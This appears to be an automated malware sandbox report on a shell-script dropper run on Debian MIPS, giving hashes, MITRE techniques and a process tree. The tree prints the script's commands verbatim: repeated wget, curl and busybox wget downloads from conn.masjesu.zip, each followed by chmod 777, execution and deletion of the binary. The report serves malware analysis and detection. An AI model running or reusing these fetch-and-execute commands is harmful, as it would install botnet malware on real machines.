3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9

Analysis

max time kernel
77s
max time network
75s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20/11/2024, 02:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh
Size

10KB
MD5

0766721821c3e4418c33ba73125add0a
SHA1

dbb008070c9b62378d29f42036e1fc7efe93f963
SHA256

3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9
SHA512

9a6809971b4580445532ad31ea38a94caae344dc687e796b088d42efecba73548b90e7514e730e39075a44df9ea80b63cedb38e1a9f07cccb2723a46ca0f4f19
SSDEEP

192:iUkUUUxUGUaUhdFgHDIvv1WZMMLGhltufzapUkUUUxUGUaUxdFgHD+eMMLGHltuv:Gv1W2ltufzaNltufzD

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
757	chmod
912	chmod
823	chmod
874	chmod
933	chmod
1003	chmod
816	chmod
838	chmod
905	chmod
919	chmod
926	chmod
968	chmod
891	chmod
881	chmod
940	chmod
996	chmod
750	chmod
947	chmod
989	chmod
782	chmod
867	chmod
898	chmod
961	chmod
975	chmod
1017	chmod
954	chmod
982	chmod
1010	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
834	busybox
895	curl
918	busybox
936	wget
944	curl
986	curl
844	wget
902	curl
916	curl
951	curl
1002	busybox
1013	wget
884	wget
894	wget
981	busybox
988	busybox
993	curl
1000	curl
1007	curl
723	wget
813	busybox
826	wget
946	busybox
958	curl
964	wget
978	wget
870	wget
873	busybox
915	wget
929	wget
957	wget
960	busybox
1006	wget
930	curl
995	busybox
1016	busybox
820	curl
908	wget
985	wget
740	curl
760	wget
819	wget
911	busybox
923	curl
943	wget
1009	busybox
776	busybox
827	curl
871	curl
877	wget
909	curl
922	wget
967	busybox
789	wget
822	busybox
861	busybox
972	curl
979	curl
748	busybox
753	wget
756	busybox
765	curl
890	busybox
901	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y	curl
File opened for modification	/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t	curl
File opened for modification	/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t	curl
File opened for modification	/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP	curl
File opened for modification	/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL	curl
File opened for modification	/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG	curl
File opened for modification	/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d	curl
File opened for modification	/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM	curl
File opened for modification	/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX	curl
File opened for modification	/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d	curl
File opened for modification	/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv	curl
File opened for modification	/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM	curl
File opened for modification	/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8	curl
File opened for modification	/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL	curl
File opened for modification	/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG	curl
File opened for modification	/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m	curl
File opened for modification	/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s	curl
File opened for modification	/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y	curl
File opened for modification	/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s	curl
File opened for modification	/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m	curl
File opened for modification	/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh	curl
File opened for modification	/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8	curl
File opened for modification	/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX	curl
File opened for modification	/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh	curl
File opened for modification	/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx	curl
File opened for modification	/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP	curl
File opened for modification	/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv	curl
File opened for modification	/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx	curl

/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh
/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh
1⤵
PID:718
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:721
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - System Network Configuration Discovery
  PID:723
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - System Network Configuration Discovery
  PID:748
- /bin/chmod
  chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  ./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - Executes dropped EXE
  PID:751
- /bin/rm
  rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:752
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - System Network Configuration Discovery
  PID:753
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:754
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - System Network Configuration Discovery
  PID:756
- /bin/chmod
  chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  ./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - Executes dropped EXE
  PID:758
- /bin/rm
  rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:759
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - System Network Configuration Discovery
  PID:760
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:765
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - System Network Configuration Discovery
  PID:776
- /bin/chmod
  chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  ./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - Executes dropped EXE
  PID:784
- /bin/rm
  rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:787
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - System Network Configuration Discovery
  PID:789
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:800
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - System Network Configuration Discovery
  PID:813
- /bin/chmod
  chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  ./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - Executes dropped EXE
  PID:817
- /bin/rm
  rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  PID:818
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - System Network Configuration Discovery
  PID:819
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:820
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - System Network Configuration Discovery
  PID:822
- /bin/chmod
  chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  ./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - Executes dropped EXE
  PID:824
- /bin/rm
  rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:825
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - System Network Configuration Discovery
  PID:826
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:827
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - System Network Configuration Discovery
  PID:834
- /bin/chmod
  chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  ./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - Executes dropped EXE
  PID:839
- /bin/rm
  rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  PID:843
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - System Network Configuration Discovery
  PID:844
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:854
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - System Network Configuration Discovery
  PID:861
- /bin/chmod
  chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  ./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - Executes dropped EXE
  PID:868
- /bin/rm
  rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  PID:869
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - System Network Configuration Discovery
  PID:870
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:871
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - System Network Configuration Discovery
  PID:873
- /bin/chmod
  chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  ./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:876
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - System Network Configuration Discovery
  PID:877
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:878
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:880
- /bin/chmod
  chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  ./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - System Network Configuration Discovery
  PID:890
- /bin/chmod
  chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  ./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  - Executes dropped EXE
  PID:892
- /bin/rm
  rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
  2⤵
  PID:893
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - System Network Configuration Discovery
  PID:894
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:895
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:897
- /bin/chmod
  chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  ./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - Executes dropped EXE
  PID:899
- /bin/rm
  rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:900
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - System Network Configuration Discovery
  PID:901
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:902
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:904
- /bin/chmod
  chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  ./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:907
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - System Network Configuration Discovery
  PID:908
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - System Network Configuration Discovery
  PID:911
- /bin/chmod
  chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  ./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - Executes dropped EXE
  PID:913
- /bin/rm
  rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  PID:914
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - System Network Configuration Discovery
  PID:915
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:916
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - System Network Configuration Discovery
  PID:918
- /bin/chmod
  chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  ./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  PID:921
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - System Network Configuration Discovery
  PID:922
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:925
- /bin/chmod
  chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  ./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
  2⤵
  PID:928
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - System Network Configuration Discovery
  PID:929
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:932
- /bin/chmod
  chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  ./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  - Executes dropped EXE
  PID:934
- /bin/rm
  rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
  2⤵
  PID:935
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - System Network Configuration Discovery
  PID:936
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:937
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:939
- /bin/chmod
  chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  ./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  - Executes dropped EXE
  PID:941
- /bin/rm
  rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
  2⤵
  PID:942
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - System Network Configuration Discovery
  PID:943
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:944
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - System Network Configuration Discovery
  PID:946
- /bin/chmod
  chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - File and Directory Permissions Modification
  PID:947
- /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  ./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  - Executes dropped EXE
  PID:948
- /bin/rm
  rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
  2⤵
  PID:949
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:950
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:951
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:953
- /bin/chmod
  chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - File and Directory Permissions Modification
  PID:954
- /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  ./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  - Executes dropped EXE
  PID:955
- /bin/rm
  rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
  2⤵
  PID:956
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - System Network Configuration Discovery
  PID:957
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:958
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - System Network Configuration Discovery
  PID:960
- /bin/chmod
  chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - File and Directory Permissions Modification
  PID:961
- /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  ./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
  rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
  2⤵
  PID:963
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - System Network Configuration Discovery
  PID:964
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - System Network Configuration Discovery
  PID:967
- /bin/chmod
  chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  ./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
  2⤵
  PID:970
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:971
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:972
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  PID:974
- /bin/chmod
  chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - File and Directory Permissions Modification
  PID:975
- /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  ./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
  2⤵
  - Executes dropped EXE
  PID:976
